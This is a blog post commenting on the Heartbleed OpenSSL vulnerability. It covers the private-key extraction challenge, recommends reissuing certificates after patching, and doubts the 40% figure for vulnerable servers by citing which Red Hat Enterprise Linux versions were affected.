Damn, that didn’t take long. A server reboot might have contributed, but it looks like the private key got ganked pretty fast. What would be really nice (as I’ve suggested on the CloudFlare blog) would be if someone (them) could author some software to monitor the memory space during such a trial. If we could see where the valuable data was located in memory and produce a heat map representing attacked memory spaces, that would be pretty sweet and we’d have some more solid data to contribute to this investigation.
One other point to note is that, regardless of the server reboot, the aggressors did make hundreds of thousands (one made millions) of requests and scoured the retrieved data for the information. The capability to accomplish this is, needless to say, not present everywhere.
Nonetheless, it doesn’t bode well for security. It is officially demonstrably possible to obtain a private key from a compromised server. Bummer. If you run a secure operation, you should probably fork over the cash for reissued certificates after you patch your systems.
One thing which struck me at work, however, is that many professional open source software packages are not vulnerable to this exploit. People are tossing about a 40% figure when discussing the number of servers on the Internet which are vulnerable to this exploit, but I’m wondering where that figure comes from. It resembles and calls to mind figures I’ve seen regarding the number of non-Windows systems on the Internet, so if we’re just assuming that all non-Windows systems are vulnerable, that may well be a very poor assumption.
In the Red Hat Enterprise Linux environment, for example, only RHEL 6.5 systems (or RHEL 6 systems upgraded to use the affected OpenSSL package which was first released with RHEL 6.5) and the RHEL 7.0 Beta systems are affected. RHEL 5 is still supported, and it’s simply unimpacted since the OpenSSL package 1.0.1 isn’t supported. That’s probably a pretty big market share, and I’m sure that someone more inclined to do the research could determine some important facts about the major Linux distributions out there to cut down on the percentage of systems likely to have been affected by this vulnerability.
I don’t mean to continually attempt to minimalize the impact of this exploit; it is a terrible vulnerability that has significantly adversely impacted public security, but I am not convinced that it is as cataclysmic as so many reports make it out to be.